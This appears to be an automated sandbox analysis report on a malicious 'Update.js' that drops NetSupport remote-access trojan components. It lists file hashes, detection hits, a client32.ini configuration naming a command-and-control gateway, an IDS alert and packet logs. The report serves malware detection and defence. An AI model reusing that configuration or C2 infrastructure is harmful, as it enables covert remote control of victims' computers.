                                                                                                                                                SHA-512:732337F7B955E6ACAF1E3AAA3395BC44C80197D204BD3CBB3E201B6177AF6153CC9D7B22AD0E90B36796F92B0022806C32AC763EAEC733B234503890900BF284
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:aboardlevel.com/.cushiondrum.com/.connectad.io/.attractionbanana.com/.klevu.com/.stripchat.com/.360.cn/.barbarousbase.com/.tailtarget.com/.spottednoise.com/.kickfire.com/.createsend24.com/.dampdock.com/.equablekettle.com/.cmail18.com/.blesspizzas.com/.p7cloud.net/.smadex.com/.responder.co.il/.condemnedcomb.com/.aquaticowl.com/.operationchicken.com/.baitbaseball.com/.cumbersomecarpenter.com/.scrapesleep.com/.clammychicken.com/.6sense.com/.unwieldyplastic.com/.sailthru.com/.gondolagnome.com/.shakysurprise.com/.impactcdn.com/.ancientact.com/.maillist-manage.in/.bushesbag.com/.rmtag.com/.mkt8628.com/.faultycanvas.com/.fewkittens.com/.createsend6.com/.cartkitten.com/.cmail12.com/.fixedfold.com/.cmail21.com/.strangeclocks.com/.lunchroomlock.com/.stimulatingsneeze.com/.conditioncrush.com/.crimsonmeadow.com/.combcompetition.com/.mkt8586.com/.motionflowers.com/.a-mx.com/.combcattle.com/.opti-digital.com/.sundaysky.com/.aliveachiever.com/.actuallything.com/.knottyswing.com/.damagedadvice.com/.ak

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLL

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):396664
                                                                                                                                                Entropy (8bit):6.80911343409989
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:HqArkLoM/5iec2yxvUh3ho2LDnOQQ1k3+h9APjbom/n6:ekuK2XOjksobom/n6
                                                                                                                                                MD5:2C88D947A5794CF995D2F465F1CB9D10
                                                                                                                                                SHA1:C0FF9EA43771D712FE1878DBB6B9D7A201759389
                                                                                                                                                SHA-256:2B92EA2A7D2BE8D64C84EA71614D0007C12D6075756313D61DDC40E4C4DD910E
                                                                                                                                                SHA-512:E55679FF66DED375A422A35D0F92B3AC825674894AE210DBEF3642E4FC232C73114077E84EAE45C6E99A60EF4811F4A900B680C3BF69214959FA152A3DFBE542
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLL, Author: Joe Security
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 6%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L....8.W...........!................'................................................P....@.............................o...D...x....0..@...............x)...@..\E..................................Pd..@...............h............................text............................... ..`.rdata..............................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc...F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):103824
                                                                                                                                                Entropy (8bit):6.674952714045651
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:q78j0+RH6e6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDU:qwpHLiLniepfxP91/bQxnu
                                                                                                                                                MD5:C4F1B50E3111D29774F7525039FF7086
                                                                                                                                                SHA1:57539C95CBA0986EC8DF0FCDEA433E7C71B724C6
                                                                                                                                                SHA-256:18DF68D1581C11130C139FA52ABB74DFD098A9AF698A250645D6A4A65EFCBF2D
                                                                                                                                                SHA-512:005DB65CEDAACCC85525FB3CDAB090054BB0BB9CC8C37F8210EC060F490C64945A682B5DD5D00A68AC2B8C58894B6E7D938ACAA1130C1CC5667E206D38B942C5
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe, Author: Joe Security
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 27%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L....iMR.....................v...... ........ ....@.................................<h....@.................................< ..<....0...q...........|.............. ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....q...0...r..................@..@.reloc..l............z..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.ini

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):670
                                                                                                                                                Entropy (8bit):5.4631538862492635
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:u3xS2hz7q+j8ZGShR8kkivlnxOZ7+DP981E7GXXfDWQCYnmSuMtQAfRTtEa:u3I2hzp8ZNR8pivlnxOoG1fXXfD/lQAp
                                                                                                                                                MD5:15221731B8C78D255535A98220F55385
                                                                                                                                                SHA1:917CBA1D62DC16241700AC2027A67B62DBD03450
                                                                                                                                                SHA-256:B23705DDAF4DD0DA82EA5C70F7B406F13529B624DFCF8EC2C9099C07DE5B997D
                                                                                                                                                SHA-512:0883C5B8BD9865FA31614F7C8054144323DD4FC5ACD73F7E1DEC1782B1BDB2DA7F7AF4AA9BBA76847EEE42A566C5843B2F021ACCAB477805BABAB89DB6DCCF03
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:0x748b6d2f....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=1..DisableDisconnect=0..DisableManageServices=0..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..silent=1..SKMode=1..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..GatewayAddress=5.181.159.137:443..gskmode=0..GSK=FH9I<H?LDJHB<A@CCHHD;K?M..GSKX=EIHJ=HBKHH;L>GCIFI;H>MCP..

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\delegatedWebFeatures.sccd

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines (15941), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):18112
                                                                                                                                                Entropy (8bit):5.982171430913221
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:nPzOC+5CNMCUDCGxkKp2Z+TgNKvoUwyBDZS/1pMimimp5F9aQBb+ZIo1PCCZAhy1:niZtnLkKp2Z+TgNKvoUwqVS/L3mimp5i
                                                                                                                                                MD5:7FD9CD05F23D42FB6DEDA65BD1977AC9
                                                                                                                                                SHA1:DF25A2C9E1E9FA05805DA69FF41337B9F59755FB
                                                                                                                                                SHA-256:CA6C469655D4D0D7CE5BEB447DAB43048A377A6042C4800B322257567AC135D9
                                                                                                                                                SHA-512:6AE8ADDF0C55058803305F937593BA02202C99639A572BE0CACBFDE598019CF8DB7067E0392BD66C43CF7D8780E454EC5E08D68BCFD491B60A450FFC280C81B8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<CustomCapabilityDescriptor xmlns="http://schemas.microsoft.com/appx/2016/sccd" xmlns:s="http://schemas.microsoft.com/appx/2016/sccd">...<CustomCapabilities>....<CustomCapability Name="Microsoft.delegatedWebFeatures_8wekyb3d8bbwe"/>...</CustomCapabilities>...<AuthorizedEntities>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Canary_8wekyb3d8bbwe" CertificateSignatureHash="f6f717a43ad9abddc8cefdde1c505462535e7d1307e630f9544a2d14fe8bf26e"/>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Canary_8wekyb3d8bbwe" CertificateSignatureHash="279cd652c4e252bfbe5217ac722205d7729ba409148cfa9e6d9e5b1cb94eaff1"/>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Dev_8wekyb3d8bbwe" CertificateSignatureHash="f6f717a43ad9abddc8cefdde1c505462535e7d1307e630f9544a2d14fe8bf26e"/>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Dev_8wekyb3d8bbwe" CertificateSignatureHash="279cd652c4e252bfbe5217

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\install_state.json

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1794
                                                                                                                                                Entropy (8bit):3.5509498109363986
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:eCrjdMrTm893chS4Mw2n1iFotb496fjCuTiBCVXTbzVHeEVt:/rS0EQn8bB+EVt
                                                                                                                                                MD5:3F78A0569C858AD26452633157103095
                                                                                                                                                SHA1:8119BCC1D66B17CCD286FEF396FA48594188C4D0
                                                                                                                                                SHA-256:D53FC339533D39F413DDD29A69ADE19F2972383DB8FB8938D77D2E79C8573F36
                                                                                                                                                SHA-512:89842E39703970108135D71CE4C039DF19C18F04C280CB2516409758F9D22E0205567B08DBE527A6FB7C295BDA2EA8EE6A368D6FCAF6FB59645D31EF2243AD3D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview://353b2d6049dd2f0998bdd73f13855b290ad0be89f62d61dbc2672253e4fb72da.{.. "install": {.. "clids": {.. "clid1": {.. "clid": "1985548",.. "vid": "225".. },.. "clid10": {.. "clid": "1985553",.. "vid": "225".. },.. "clid100004": {.. "clid": "1985555",.. "vid": "225".. },.. "clid1010": {.. "clid": "2372823",.. "vid": "".. },.. "clid15": {.. "clid": "1985554",.. "vid": "225".. },.. "clid21": {.. "clid": "2372816",.. "vid": "".. },.. "clid25": {.. "clid": "2372817",.. "vid": "".. },.. "clid28": {.. "clid": "2372813",.. "vid": "".. },.. "clid29": {.. "clid": "2372821",.. "vid": "".. },.. "clid30": {.. "clid": "2372822",.. "v

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\msvcr100.dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):773968
                                                                                                                                                Entropy (8bit):6.901559811406837
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                                                                MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                                                                SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                                                                SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                                                                SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\nskbfltr.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:Windows setup INFormation
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):328
                                                                                                                                                Entropy (8bit):4.93007757242403
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                                                                MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                                                                SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                                                                SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                                                                SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\nsm_vpro.ini

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):46
                                                                                                                                                Entropy (8bit):4.532048032699691
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                                                                                                MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                                                                                                SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                                                                                                SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                                                                                                SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\package_metadata

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):9
                                                                                                                                                Entropy (8bit):2.4193819456463714
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:SV6:SU
                                                                                                                                                MD5:72E3BED9C0F2498AE7F7B8251EB63956
                                                                                                                                                SHA1:E9366F86EF5C31D2141FB5D209214D94DD1E24AF
                                                                                                                                                SHA-256:96E946E3EE860C6FAF9557327EFA311AE804AA58DD58632261B16C3C567BAA5A
                                                                                                                                                SHA-512:68EFACA86096F94C5FC7972F073361E4B12A3219834C0F3A6933837A35FA023A87D310B9E5AA2A8F88F9069320C60A490A24BA47219925010D69F88910C99758
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:1.0.8.0..

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\pcicapi.dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):33144
                                                                                                                                                Entropy (8bit):6.7376663312239256
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:JFvNhAyi5hHA448qZkSn+EgT8ToDXTVi0:JCyoHA448qSSzgIQb
                                                                                                                                                MD5:34DFB87E4200D852D1FB45DC48F93CFC
                                                                                                                                                SHA1:35B4E73FB7C8D4C3FEFB90B7E7DC19F3E653C641
                                                                                                                                                SHA-256:2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703
                                                                                                                                                SHA-512:F5BB4E700322CBAA5069244812A9B6CE6899CE15B4FD6384A3E8BE421E409E4526B2F67FE210394CD47C4685861FAF760EFF9AF77209100B82B2E0655581C9B2
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\pcicapi.dll, Author: Joe Security
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\remcmdstub.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):63864
                                                                                                                                                Entropy (8bit):6.446503462786185
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:Tf6fvDuNcAjJMBUHYBlXU1wT2JFqy9BQhiK:D6f7cjJ4U4I1jFqy92hiK
                                                                                                                                                MD5:6FCA49B85AA38EE016E39E14B9F9D6D9
                                                                                                                                                SHA1:B0D689C70E91D5600CCC2A4E533FF89BF4CA388B
                                                                                                                                                SHA-256:FEDD609A16C717DB9BEA3072BED41E79B564C4BC97F959208BFA52FB3C9FA814
                                                                                                                                                SHA-512:F9C90029FF3DEA84DF853DB63DACE97D1C835A8CF7B6A6227A5B6DB4ABE25E9912DFED6967A88A128D11AB584663E099BF80C50DD879242432312961C0CFE622
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 24%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$U..`4..`4..`4..{.D.q4..{.p.54..iLI.e4..`4..74..{.q.}4..{.@.a4..{.G.a4..Rich`4..................PE..L......U.....................J.......!............@.......................... .......o....@....................................<.......T...............x)..............................................@...............@............................text............................... ..`.rdata...%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:ASCII text, with very long lines (463)
                                                                                                                                                Entropy (8bit):5.097957412360465
                                                                                                                                                TrID:
                                                                                                                                                  File name:Update.js
                                                                                                                                                  File size:4'053'374 bytes
                                                                                                                                                  MD5:01d7daa58e16da2b30ac20fe57081bba
                                                                                                                                                  SHA1:8213900420ed4c22b1e896acb53f99a5989cb2cd
                                                                                                                                                  SHA256:a05933c299a81badef96fd575ff0f7d934c3edaf0f7478e897a2299f1ef8f11e
                                                                                                                                                  SHA512:9a99fbf90fb7274cb0a1300c8052ee419258575b6202df9f78ed0c5dd0d5905cab63a92a96d426261257bead247b125bc05086f622589f3080abd53cddd14f64
                                                                                                                                                  SSDEEP:49152:OCz4F9dM2furCz4F9dM2fuVCz4F9dM2furCz4F9dM2fuWCz4F9dM2furCz4F9dME:OkGgkGMkGgkGNkGgkG9
                                                                                                                                                  TLSH:5216640879E3985CA52374799A7FE844B2354117E09EEED1B49CF9F00FA00744A7AE7E
                                                                                                                                                  File Content Preview:(function() {. function r(e, n, t) {. function o(i, f) {. if (!n[i]) {. if (!e[i]) {. var c = "function" == typeof require && require;. if (!f && c) return c(i, !0);.

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:68d69b8bb6aa9a86

                                                                                                                                                  Network Behavior

                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                  2024-10-08T15:23:14.568547+02002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.16497085.181.159.137443TCP

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Oct 8, 2024 15:23:28.378079891 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:28.378119946 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:28.379084110 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:28.382420063 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:28.382436037 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:28.890182018 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:28.890278101 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:28.937812090 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:28.937834978 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:28.938220978 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:28.938333988 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:28.940495014 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:28.940495014 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:28.940573931 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.213757038 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.213795900 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.213848114 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.213865995 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.213895082 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.213946104 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.219373941 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.219402075 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.219463110 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.219475985 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.219526052 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.221127987 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.221143961 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.221219063 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.221231937 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.221276999 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.281585932 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.281609058 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.281702995 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.281732082 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.281795979 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.281971931 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.281987906 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.282073975 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.282085896 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.282119989 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.282854080 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.282871008 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.282951117 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.282968044 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.283008099 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.303800106 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.303827047 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.303895950 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.303915977 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.303970098 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.369173050 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.369204998 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.369285107 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.369314909 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.369379044 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.369793892 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.369811058 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.369872093 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.369879961 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.369900942 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.369930983 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.370388985 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.370409966 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.370481014 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.370490074 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.370542049 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.371176958 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.371202946 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.371253014 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.371259928 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.371283054 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.371300936 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.372251987 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.372275114 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.372318983 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:29.372325897 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:29.372354031 CEST49705443192.168.2.1677.83.199.112
